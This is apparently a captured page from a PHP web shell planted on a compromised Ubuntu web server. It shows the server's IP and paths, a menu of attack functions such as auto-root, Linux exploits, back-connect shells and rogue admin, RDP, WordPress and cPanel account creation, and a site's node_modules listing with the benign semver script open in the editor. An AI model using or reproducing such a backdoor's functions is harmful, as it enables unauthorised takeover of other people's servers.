Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdg.amatya.biz-8 /
node_modules /
.bin /
[ HOME SHELL ]
Name
Size
Permission
Action
acorn
62
B
-rwxrwxr-x
ansi-html
1.99
KB
-rwxrwxr-x
autoprefixer
554
B
-rwxrwxr-x
browserslist
3.91
KB
-rwxrwxr-x
concat
555
B
-rwxrwxr-x
cssesc
3.03
KB
-rwxrwxr-x
envinfo
6.56
KB
-rwxrwxr-x
he
3.54
KB
-rwxrwxr-x
html-minifier-terser
11.47
KB
-rwxrwxr-x
import-local-fixture
126
B
-rwxrwxr-x
is-docker
105
B
-rwxrwxr-x
jsesc
3.74
KB
-rwxrwxr-x
json5
2.83
KB
-rwxrwxr-x
laravel-mix
5.29
KB
-rwxrwxr-x
miller-rabin
599
B
-rwxrwxr-x
mime
149
B
-rwxrwxr-x
mix
5.29
KB
-rwxrwxr-x
mkdirp
731
B
-rwxrwxr-x
multicast-dns
1.34
KB
-rwxrwxr-x
nanoid
91
B
-rwxrwxr-x
node-which
985
B
-rwxrwxr-x
parser
328
B
-rwxrwxr-x
regjsparser
1.74
KB
-rwxrwxr-x
rimraf
1.83
KB
-rwxrwxr-x
semver
4.26
KB
-rwxrwxr-x
sha.js
991
B
-rwxrwxr-x
svgo
279
B
-rwxrwxr-x
terser
444
B
-rwxrwxr-x
uuid
1.54
KB
-rwxrwxr-x
webpack
3.81
KB
-rwxrwxr-x
webpack-cli
1.18
KB
-rwxrwxr-x
webpack-dev-server
4.3
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : semver
#!/usr/bin/env node // Standalone semver comparison program. // Exits successfully and prints matching version(s) if // any supplied version is valid and passes all tests. const argv = process.argv.slice(2) let versions = [] const range = [] let inc = null const version = require('../package.json').version let loose = false let includePrerelease = false let coerce = false let rtl = false let identifier const semver = require('../') let reverse = false const options = {} const main = () => { if (!argv.length) return help() while (argv.length) { let a = argv.shift() const indexOfEqualSign = a.indexOf('=') if (indexOfEqualSign !== -1) { a = a.slice(0, indexOfEqualSign) argv.unshift(a.slice(indexOfEqualSign + 1)) } switch (a) { case '-rv': case '-rev': case '--rev': case '--reverse': reverse = true break case '-l': case '--loose': loose = true break case '-p': case '--include-prerelease': includePrerelease = true break case '-v': case '--version': versions.push(argv.shift()) break case '-i': case '--inc': case '--increment': switch (argv[0]) { case 'major': case 'minor': case 'patch': case 'prerelease': case 'premajor': case 'preminor': case 'prepatch': inc = argv.shift() break default: inc = 'patch' break } break case '--preid': identifier = argv.shift() break case '-r': case '--range': range.push(argv.shift()) break case '-c': case '--coerce': coerce = true break case '--rtl': rtl = true break case '--ltr': rtl = false break case '-h': case '--help': case '-?': return help() default: versions.push(a) break } } const options = { loose: loose, includePrerelease: includePrerelease, rtl: rtl } versions = versions.map((v) => { return coerce ? (semver.coerce(v, options) || { version: v }).version : v }).filter((v) => { return semver.valid(v) }) if (!versions.length) return fail() if (inc && (versions.length !== 1 || range.length)) { return failInc() } for (let i = 0, l = range.length; i < l; i++) { versions = versions.filter((v) => { return semver.satisfies(v, range[i], options) }) if (!versions.length) return fail() } return success(versions) } const failInc = () => { console.error('--inc can only be used on a single version with no range') fail() } const fail = () => process.exit(1) const success = () => { const compare = reverse ? 'rcompare' : 'compare' versions.sort((a, b) => { return semver[compare](a, b, options) }).map((v) => { return semver.clean(v, options) }).map((v) => { return inc ? semver.inc(v, inc, options, identifier) : v }).forEach((v, i, _) => { console.log(v) }) } const help = () => console.log( `SemVer ${version} A JavaScript implementation of the https://semver.org/ specification Copyright Isaac Z. Schlueter Usage: semver [options] <version> [<version> [...]] Prints valid versions sorted by SemVer precedence Options: -r --range <range> Print versions that match the specified range. -i --increment [<level>] Increment a version by the specified level. Level can be one of: major, minor, patch, premajor, preminor, prepatch, or prerelease. Default level is 'patch'. Only one version may be specified. --preid <identifier> Identifier to be used to prefix premajor, preminor, prepatch or prerelease version increments. -l --loose Interpret versions and ranges loosely -p --include-prerelease Always include prerelease versions in range matching -c --coerce Coerce a string into SemVer if possible (does not imply --loose) --rtl Coerce version strings right to left --ltr Coerce version strings left to right (default) Program exits successfully if any valid version satisfies all supplied ranges, and prints all satisfying versions. If no satisfying versions are found, then exits failure. Versions are printed in ascending order, so supplying multiple versions to the utility will just sort them.`) main()
Close